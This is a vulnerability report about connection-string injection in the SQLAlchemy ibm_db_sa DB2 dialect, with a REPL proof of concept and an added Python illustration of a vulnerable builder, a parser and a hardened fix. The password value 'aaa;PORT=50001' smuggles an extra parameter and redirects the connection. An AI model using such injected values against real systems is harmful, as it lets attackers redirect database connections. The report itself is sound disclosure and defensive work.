Hi, I discovered an issue in the db engine creation code: when the code prepares the db connection string, it fails to escape the semicolon char. This makes it possible to inject arbitrary parameters into the connection string. Under some circumstances this can be a security issue.
PoC: I created two db2 instances in docker, one listening on tcp/50000 (default) and the other on tcp/50001.

ActivePython 2.7.8.10 (ActiveState Software Inc.) based on
Python 2.7.8 (default, Jul 2 2014, 19:48:49) [MSC v.1500 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import sqlalchemy
>>> from sqlalchemy import *
>>> import ibm_db_sa
>>> from urllib import quote
>>> import sys
>>>
>>> pw="aaa"
>>> db2 = sqlalchemy.create_engine('ibm_db_sa://db2inst1:%s@192.168.99.100/test' % quote(pw))
>>> conn = db2.connect()
>>> conn.execute("select host_name from TABLE(SYSPROC.ENV_GET_SYS_INFO()) AS SYSTEMINFO").fetchall()
[(u'b5b9411e889e',)]
>>> conn.close()
>>>
>>> pw="aaa;PORT=50001"
>>> db2 = sqlalchemy.create_engine('ibm_db_sa://db2inst1:%s@192.168.99.100/test' % quote(pw))
>>> conn = db2.connect()
>>> conn.execute("select host_name from TABLE(SYSPROC.ENV_GET_SYS_INFO()) AS SYSTEMINFO").fetchall()
[(u'e6aa666c18bf',)]
>>> conn.close()
>>> sqlalchemy.__version__
'0.9.8'

As you can see, I was able to trick the program into connecting to an alternative database via the password. (Which is a realistic vector, I think.)

My sqlalchemy version is not the latest because I installed it from the ActiveState repo. If you've already fixed this then ignore my message. Unfortunately I don't have time to further test this with other versions or DB drivers.

Regards,
Miklós
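The mechanism behind the report, as an added Python 3 illustration that is not code from the thread, from sqlalchemy or from ibm_db_sa: a hypothetical builder concatenates URL components into a DB2 CLI style "KEY=value;" string without escaping, a naive parser shows how the ";PORT=50001" smuggled in through the password becomes a separate parameter, and a hardened builder refuses metacharacters. The key order in the string, the "later value wins" behaviour, and all function names are assumptions chosen to reproduce what the PoC observed; the sample host, user and database names are constructed.

```python
"""Connection-string injection via an unescaped semicolon (illustration).

Added example, not code from sqlalchemy or ibm_db_sa. It mimics the pattern
the report describes: URL components are concatenated into a DB2 CLI style
"KEY=value;KEY=value;" string without escaping, so a ';' inside the password
starts a new key/value pair. The key order and the "last value wins" rule
are assumptions modelled on the observed behaviour (the injected PORT took
effect), not the driver's documented semantics.
"""
from urllib.parse import quote, unquote

# Constructed sample values (the PoC used a Docker host and a database "test").
USER, HOST, DB = "db2inst1", "192.168.99.100", "test"
SAFE_PW = "aaa"
INJECTED_PW = "aaa;PORT=50001"
FORBIDDEN = ";="  # characters that change the structure of the string


def build_conn_str_vulnerable(user, pw, host, db, port=50000):
    """Hypothetical builder with the flaw: values are inserted verbatim."""
    return ("DATABASE=%s;HOSTNAME=%s;PORT=%d;PROTOCOL=TCPIP;UID=%s;PWD=%s;"
            % (db, host, port, user, pw))


def parse_conn_str(conn_str):
    """Parse "K=v;K=v;" the way a naive driver would: split on ';', then on
    the first '='. A repeated key overwrites the earlier value (assumption
    matching the PoC, where the injected PORT was the one used)."""
    params = {}
    for pair in conn_str.split(";"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[key.strip().upper()] = value
    return params


def url_password_reaches_builder(pw):
    """The reporter percent-encoded the password in the SQLAlchemy URL, but
    URL components are decoded before the native string is built, so the
    raw ';' is what reaches the builder. Returns the decoded password."""
    return unquote(quote(pw))


def build_conn_str_safe(user, pw, host, db, port=50000):
    """Hardened builder: refuse any value that could alter the structure of
    the string. Rejecting is the conservative choice; if the driver documents
    an escaping syntax for these characters, use that instead (assumption)."""
    for name, value in (("UID", user), ("PWD", pw),
                        ("DATABASE", db), ("HOSTNAME", host)):
        if any(ch in value for ch in FORBIDDEN):
            raise ValueError("%s contains a connection-string metacharacter"
                             % name)
    return build_conn_str_vulnerable(user, pw, host, db, port)


def effective_port(pw):
    """Port a naive driver would connect to for a given URL password."""
    decoded = url_password_reaches_builder(pw)
    return parse_conn_str(build_conn_str_vulnerable(USER, decoded, HOST, DB))["PORT"]


def safe_builder_rejects(pw):
    """True if the hardened builder refuses the password."""
    try:
        build_conn_str_safe(USER, pw, HOST, DB)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for pw in (SAFE_PW, INJECTED_PW):
        print("%-18r -> PORT=%s, rejected by safe builder: %s"
              % (pw, effective_port(pw), safe_builder_rejects(pw)))
```

Running the block shows the password "aaa" yielding PORT=50000 and "aaa;PORT=50001" yielding PORT=50001 from the vulnerable builder, while the hardened builder rejects the second. The point of url_password_reaches_builder is that percent-encoding the password in the URL, as the PoC did, is not a defence: it is undone by URL parsing before the native string is assembled, so the fix has to live where the string is built.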